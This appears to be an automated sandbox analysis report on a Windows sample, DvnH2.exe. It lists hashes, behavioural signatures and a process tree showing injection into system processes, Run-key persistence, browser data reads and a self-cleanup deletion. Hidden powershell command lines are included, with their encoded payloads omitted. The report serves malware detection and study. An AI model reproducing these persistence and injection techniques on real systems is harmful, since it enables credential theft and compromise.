Analysis
max time kernel: 148s
max time network: 149s
platform: windows7_x64
resource: win7
submitted: 09-07-2020 13:48
Static task: static1
Behavioral task: behavioral1
  Sample: DvnH2.exe
  Resource: win7 (windows7_x64)
  0 signatures, 0 seconds
Behavioral task: behavioral2
  Sample: DvnH2.exe
  Resource: win10v200430 (windows10_x64)
  0 signatures, 0 seconds
General
Target: DvnH2.exe
Size: 847KB
MD5: bc23e4cf90c63d9a84eb905e6ec82f82
SHA1: b82df977fcc19b730ac2cdacec7d3b93617c57ed
SHA256: 0396da4728728701d82bea35844941b36b6ff001bd4a46b3e3f45d5143205b16
SHA512: 01007caceb1e777b55d3118f7cb21117f2ca17b4caf211108b90de705c490c472df859da2802d015329b856d1be303bff6f73a624cb720682cea3f1cd0dcddd4
Malware Config
Signatures

Suspicious use of AdjustPrivilegeToken (5 IoCs)
Processes: powershell.exe, powershell.exe, MSBuild.exe, systray.exe, Explorer.EXE
  description | pid | process
  Token: SeDebugPrivilege | 1424 | powershell.exe
  Token: SeDebugPrivilege | 792 | powershell.exe
  Token: SeDebugPrivilege | 1532 | MSBuild.exe
  Token: SeDebugPrivilege | 1720 | systray.exe
  Token: SeShutdownPrivilege | 1296 | Explorer.EXE

Suspicious behavior: EnumeratesProcesses (31 IoCs)
Processes: powershell.exe, powershell.exe, MSBuild.exe, systray.exe
  pid | process | hits
  1424 | powershell.exe | 2
  792 | powershell.exe | 2
  1532 | MSBuild.exe | 2
  1720 | systray.exe | 25

Blacklisted process makes network request (2 IoCs)
Processes: powershell.exe
  flow | pid | process
  5 | 792 | powershell.exe
  6 | 792 | powershell.exe

Drops file in Program Files directory (1 IoCs)
Processes: systray.exe
  description | ioc | process
  File opened for modification | C:\Program Files (x86)\Dnnupd\gdiedg4.exe | systray.exe

Suspicious use of WriteProcessMemory (28 IoCs)
Processes: DvnH2.exe, powershell.exe, powershell.exe, Explorer.EXE, systray.exe
  description | pid | process | target process | hits
  PID 316 wrote to memory of 1424 | 316 | DvnH2.exe | powershell.exe | 4
  PID 1424 wrote to memory of 792 | 1424 | powershell.exe | powershell.exe | 4
  PID 792 wrote to memory of 1532 | 792 | powershell.exe | MSBuild.exe | 7
  PID 1296 wrote to memory of 1720 | 1296 | Explorer.EXE | systray.exe | 4
  PID 1720 wrote to memory of 1852 | 1720 | systray.exe | cmd.exe | 4
  PID 1720 wrote to memory of 1012 | 1720 | systray.exe | Firefox.exe | 5

Adds Run entry to policy start application (2 TTPs, 2 IoCs)
Processes: systray.exe
  description | ioc | process
  Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run | systray.exe
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\LPXXV = "C:\\Program Files (x86)\\Dnnupd\\gdiedg4.exe" | systray.exe

Modifies Internet Explorer settings
Processes: systray.exe
  description | ioc | process
  Key created | \Registry\User\S-1-5-21-1131729243-447456001-3632642222-1000\SOFTWARE\Microsoft\Internet Explorer\IntelliForms\Storage2 | systray.exe

Suspicious use of SetThreadContext (3 IoCs)
Processes: powershell.exe, MSBuild.exe, systray.exe
  description | pid | process | target process
  PID 792 set thread context of 1532 | 792 | powershell.exe | MSBuild.exe
  PID 1532 set thread context of 1296 | 1532 | MSBuild.exe | Explorer.EXE
  PID 1720 set thread context of 1296 | 1720 | systray.exe | Explorer.EXE

Suspicious behavior: MapViewOfSection (7 IoCs)
Processes: MSBuild.exe, systray.exe
  pid | process | hits
  1532 | MSBuild.exe | 3
  1720 | systray.exe | 4

Suspicious use of SendNotifyMessage (4 IoCs)
Processes: Explorer.EXE
  pid | process | hits
  1296 | Explorer.EXE | 4

Reads user/profile data of web browsers (2 TTPs)
Infostealers often target stored browser data, which can include saved credentials etc.

System policy modification (1 TTPs, 1 IoCs)
Processes: systray.exe
  description | ioc | process
  Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer | systray.exe

Suspicious use of FindShellTrayWindow (5 IoCs)
Processes: Explorer.EXE
  pid | process | hits
  1296 | Explorer.EXE | 5

Drops file in System32 directory (2 IoCs)
Processes: powershell.exe, powershell.exe
  description | ioc | process | hits
  File opened for modification | C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | powershell.exe | 2

Checks whether UAC is enabled
Processes: Explorer.EXE
  description | ioc | process
  Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | Explorer.EXE
Processes

C:\Windows\Explorer.EXE (PID 1296)
  Command line: C:\Windows\Explorer.EXE
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  - Suspicious use of SendNotifyMessage
  - Suspicious use of FindShellTrayWindow
  - Checks whether UAC is enabled

  C:\Users\Admin\AppData\Local\Temp\DvnH2.exe (PID 316)
    Command line: "C:\Users\Admin\AppData\Local\Temp\DvnH2.exe"
    - Suspicious use of WriteProcessMemory

    C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 1424)
      Command line: powershell.exe PowERsHELl.`ExE -ExecutionPolicy bypass -w 1 /e [base64-encoded command omitted]
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of WriteProcessMemory
      - Drops file in System32 directory

      C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 792)
        Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy bypass -w 1 /e [encoded command omitted]
        - Suspicious use of AdjustPrivilegeToken
        - Suspicious behavior: EnumeratesProcesses
        - Blacklisted process makes network request
        - Suspicious use of WriteProcessMemory
        - Suspicious use of SetThreadContext
        - Drops file in System32 directory

        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe (PID 1532)
          Command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
          - Suspicious use of AdjustPrivilegeToken
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of SetThreadContext
          - Suspicious behavior: MapViewOfSection

  C:\Windows\SysWOW64\systray.exe (PID 1720)
    Command line: "C:\Windows\SysWOW64\systray.exe"
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious behavior: EnumeratesProcesses
    - Drops file in Program Files directory
    - Suspicious use of WriteProcessMemory
    - Adds Run entry to policy start application
    - Modifies Internet Explorer settings
    - Suspicious use of SetThreadContext
    - Suspicious behavior: MapViewOfSection
    - System policy modification

    C:\Windows\SysWOW64\cmd.exe (PID 1852)
      Command line: /c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"

    C:\Program Files\Mozilla Firefox\Firefox.exe (PID 1012)
      Command line: "C:\Program Files\Mozilla Firefox\Firefox.exe"